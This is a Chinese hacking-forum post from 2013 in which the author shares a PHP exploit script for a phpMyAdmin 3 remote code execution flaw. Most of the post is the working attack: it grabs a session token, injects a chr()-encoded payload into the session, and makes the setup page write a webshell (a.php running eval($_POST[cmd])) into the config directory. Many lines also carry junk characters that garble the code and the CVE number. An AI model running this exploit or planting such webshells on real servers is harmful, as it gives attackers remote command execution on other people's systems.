找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2211|回复: 0
打印 上一主题 下一主题

phpadmin3 remote code execute php版本exploit

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-21 09:13:03 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
最近在家做专职奶爸,不谙圈内事很多months了,博客也无更新。
7 y# p( B% }0 L& E6 H! t) E' e
7 d6 u: N7 K; U2 N昨夜带孩子整夜未眠,看到黑哥在php security群里关于phpmyadmin3漏洞的讨论,虽然之前没看过漏洞代码,不过前段时间还是在微博上看到wofeiwo的exp了,不过据黑哥说有不鸡肋的利用方法,于是夜里翻代码出来研究了翻,写出了这个冷饭exp,由于我搞的晚了,之前已经很多人研究了写exp了,于是我这个属于炒冷饭,权当研究研究打发时间了。
: q8 B( P$ K8 c
2 k8 m! b3 A5 ^( E1 \7 c首先赞下wofeiwo的python版本的exp,再赞下wofeiwo跟superhei的钻研精神,学习的榜样啊。不过之前那个exp利用起来是有一些限制的:" y0 A! S6 l+ I. n+ Q4 T
一是session.auto_start = 1;
) h* H! g3 e' k2 H4 @3 v二是pma3默认代码里libraries目录已经用.htaccess控制了不允许访问。
+ z* G$ ]  M7 r当然还有第三点大家都不可以逾越的鸿沟:config目录存在且可写。
" P/ d- W% E2 l0 a& y4 ]6 a) ~! L" ^( a" S# p: M0 p
在群里看了黑哥的发言后,再看了下代码,发现前两点利用限制均可以无视。所以其实这个漏洞还真的可以不是那么鸡肋。
8 g: B) V# z8 U3 \0 u& x6 b) C* ]9 }& U
7 x* i( ^) y+ q& k! ?# ~于是写了这个php版本的exp,代码如下:& [' L  k+ M# T  i- \8 \

. R  Y( w$ j  \#!/usr/bin/php- w; e, n4 C7 C. L
<?php
' Z$ d8 w, O, R8 h- o2 {- _print_r('
; B7 N9 t9 T7 D/ C3 C+---------------------------------------------------------------------------+( v( R1 {) U( b
pma3 - phpMyAdmin3 remote code execute exploit [Not jilei(chicken\'s ribs)]; D3 f+ t, v& r
by oldjun(www.oldjun.com)
8 f0 \8 E7 M2 f3 W% ~% }welcome to www.t00ls.net
5 e; g$ K( y( e7 q; l. @mail: oldjun@gmail.com
# g1 w; P* o7 m4 F, q8 AAssigned CVE id: CVE-2011-25052 m- @2 d5 V. b5 L& i3 d" G2 P) Y. J% W
+---------------------------------------------------------------------------+0 j1 c7 h: N% j
');
% v  x, F; }" U# m: m0 x/ Z
) C1 I( S9 N2 J. H; Y5 `/**
; c8 T* J5 m" ~5 @ * working when the directory:"config" exists and is writeable.
0 }. d8 V5 H2 S6 X4 x; g**/7 t( q8 Y& _# N* z. N
' Q2 e. K' N! D
if ($argc < 3) {
! q% Q; ~, I$ u9 e$ U: Z    print_r('- M/ |" u- `3 l% ~: b
+---------------------------------------------------------------------------+
0 m8 m7 T2 i  D2 H3 BUsage: php '.$argv[0].' host path& V; ?6 y  ^. i! Z, P
host:      target server (ip/hostname)
3 O5 J  w* n6 m6 @# E; opath:      path to pma3' {- {9 K) p8 z+ U7 t  c
Example:! {- _" D/ V0 }2 D  Z% a/ Q3 O+ M5 a
php '.$argv[0].' localhost /pma/
* |% h% t! _5 a; w2 g1 {6 r+---------------------------------------------------------------------------+$ T9 e. f9 A# f* w
');
* H8 }7 w% K+ x" R2 p    exit;
( ^% m; z( s, `; c}
( q; q( J6 X& i( l" P. \) C" v. G8 f+ j, {( g+ U
$host = $argv[1];
6 e  }) E4 W) F& K$path = $argv[2];* c- A" Z8 h" V, E
% o* `. O, X' J: r2 t& t' c& |
/**
9 v" p( ~! u4 f! K. d * Try to determine if the directory:"config" exists8 I& N) R1 @1 I1 t, s; s$ j
**/
3 c% F1 i9 ?9 w! V' secho "[+] Try to determine if the directory:config exists....\n";
  r- r+ N( S  x4 Z: I$returnstr=php_request('config/');! D6 J- F) }, b: g* @
if(strpos($returnstr,'404')){
4 X) A4 h$ V; M8 n* H1 R/ w; Y" _% j0 O    exit("[-] Exploit Failed! The directory:config do not exists!\n");
+ d+ i" A$ {  p}5 Q: D, [4 W- x2 P5 Q
6 x+ {# a$ \* m* [
/**
& }0 P8 [' L, H8 o9 K' G0 `+ k * Try to get token and sessionid
1 ~. t3 a1 s# J9 s, x) L: ~, g**/2 K) J9 D. i. i' ?
echo "[+] Try to get token and sessionid....\n";5 ~6 m" c/ u5 L0 M7 S3 g) G3 ~
$result=php_request('index.php');3 W9 a2 u3 E% {9 |
preg_match('/phpMyAdmin=(\w{32,40})\;(.*?)token=(\w{32})\&/s', $result, $resp);
7 f& z: K& C$ ]$token=$resp[3];
/ Y5 R' h; b( ]" c! O$sessionid=$resp[1];3 Z( D' B4 F2 P- z
if($token && $sessionid){) u) v: M7 I, F# r$ R% Z
    echo "[+] tokentoken\n";
1 T- z; K  C2 S( t$ n+ k2 z6 q    echo "[+] Session IDsessionid\n";
2 W( e8 h- ^- y0 j6 R; H}else{% m# s; P7 z  y8 [3 q7 i
    exit("[-] Can't get token and Session ID,Exploit Failed!\n");
2 ^% u$ T' T; L! \! z8 _}
' P2 r$ {2 n, Z  j, @
% Y2 P. S+ o! q4 a/**/ {4 V. A5 p" Y1 Y' z( J2 c- I
* Try to insert shell into session& ~8 T  V, e# y, u! A
**/, N6 t8 N  ?" h/ p3 x1 E
echo "[+] Try to insert shell into session....\n";
; n3 W+ Y2 C, |/ ~5 \$ _, \6 {1 S0 _php_request('db_create.php?token='.$token.'&session_to_unset=t00ls&_SESSION[ConfigFile][Servers][*/eval(chr(102).chr(112).chr(117).chr(116).chr(115).chr(40).chr(102).chr(111).chr(112).chr(101).chr(110).chr(40).chr(39).chr(97).chr(46).chr(112).chr(104).chr(112).chr(39).chr(44).chr(39).chr(119).chr(39).chr(41).chr(44).chr(39).chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(99).chr(109).chr(100).chr(93).chr(41).chr(63).chr(62).chr(39).chr(41).chr(59).chr(101).chr(99).chr(104).chr(111).chr(40).chr(39).chr(116).chr(48).chr(48).chr(108).chr(115).chr(39).chr(41).chr(59));/*][host]=t00ls.net','','phpMyAdmin='.$sessionid);//Actually,almost all the php files in home directory of pma3 can be used here.
1 t3 L3 O7 ^: E( X# w& c7 K; L2 _% j' J8 a4 t3 y6 s# L, O4 e
/**
  q& n1 s9 S+ I6 |4 J6 `+ h * Try to create webshell& x5 S6 X* S  U- t, V* G
**/
. p' t" h0 O4 x" {+ C' g+ Wecho "[+] Try to create webshell....\n";9 O! R/ x! x8 x( ]+ ^; Y
php_request('setup/config.php','phpMyAdmin='.$sessionid.'&tab_hash=&token='.$token.'&check_page_refresh=&DefaultLang=en&ServerDefault=0&eol=unix&submit_save=Save','phpMyAdmin='.$sessionid);
  z$ `7 J: `9 s, K* b. e6 H8 p/**
9 ^8 Z0 J1 F) }' l) i& D1 U * Try to check if the webshell was created successfully
( S8 H+ G" o* R  r2 U**/
; m# D1 J5 B, w- H' m5 G* Jecho "[+] Try to check if the webshell was created successfully....\n";5 s% e! G1 g% |( u4 ^8 K/ X
$content=php_request('config/config.inc.php');
2 X; O( b$ f4 c  F+ ~if(strpos($content,'t00ls')){
: e9 F4 k& n3 j: K$ C    echo "[+] Congratulations! Expoilt successfully....\n";% S" A) @( j' U( h6 i# L
    echo "[+] Webshell:http://$host{$path}config/a.php eval(\$_POST[cmd])\n";6 @4 H: d$ ^# y# Q: U6 D" g
}else{
: w* ~8 L& }2 b! m. _0 T5 t( D, |, J    exit("[-] Exploit Failed! Perhaps the directory:config do not exists or is not writeable!\n");  y8 _# m2 O8 e5 x, }4 a
}
2 n, s3 d' x$ U8 a) r) H0 V& U- m
0 Z- H6 C6 A4 N2 H6 ofunction php_request($url,$data='',$cookie=''){' Y- r) U3 w- R1 K% @7 ~  A) V
    global  $host, $path;1 K9 u: D. s; u$ F; ]6 ?
   
8 g/ q: X- _# H    $method=$data?'POST':'GET';
8 ~$ P- f! L" B( ~   
) R  H; s( S* A; A3 p! ?    $packet = $method." ".$path.$url." HTTP/1.1\r\n";& J3 C* g* r8 z0 ^7 Z; q
    $packet .= "Accept: */*\r\n";
, y% y9 Z; z) X) m, p( @& g/ o    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n";
, R3 b& i' T- Z. }- F4 J! l    $packet .= "Host: $host\r\n";
) o6 J( V! ~* B+ t9 C% s  g    $packet .= $data?"Content-Type: application/x-www-form-urlencoded\r\n":"";
* Z' b: f4 i  e2 L# Y    $packet .= $data?"Content-Length: ".strlen($data)."\r\n":"";: ~2 G% O* s" x
    $packet .= $cookie?"Cookie: $cookie\r\n":"";' T1 W! l8 _3 c% ~1 K( _
    $packet .= "Connection: Close\r\n\r\n";3 O: c" D. Z; b1 T$ v
    $packet .= $data?$data:"";' w# q' r. P# f* `
  J" g" f$ p* ^, Q, O! O- ~  |
    $fp = fsockopen(gethostbyname($host), 80);
* h$ w: W- q9 U; i: t    if (!$fp) {0 _, Z  g1 ~/ Y' u
    echo 'No response from '.$host; die;
6 |3 C  o/ T# R9 D    }, [) E; G: r/ e1 K2 b3 ~
    fputs($fp, $packet);. p6 `0 i% |# d* D( {6 n$ I. j  |

/ W( M7 \% I: P; k2 K, G    $resp = '';
3 D" T8 Q. M$ f! X% q- h7 A7 q1 z1 R, t) D0 T0 `: H
    while ($fp && !feof($fp))
! f! C& B# Q) H5 `7 a5 N        $resp .= fread($fp, 1024);4 I( }6 }  [% }) }* E5 n

4 B5 L, V6 ?. P- K2 n3 B6 y. |  e    return $resp;1 K. _$ m8 u/ b8 S& s$ X; D
}4 U; j7 ^: R% f' e( z8 s4 d
    # w) F$ N6 L* i7 f; d1 T# o$ y2 g
?>
( W0 T& V! r+ F& c- r& q.
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表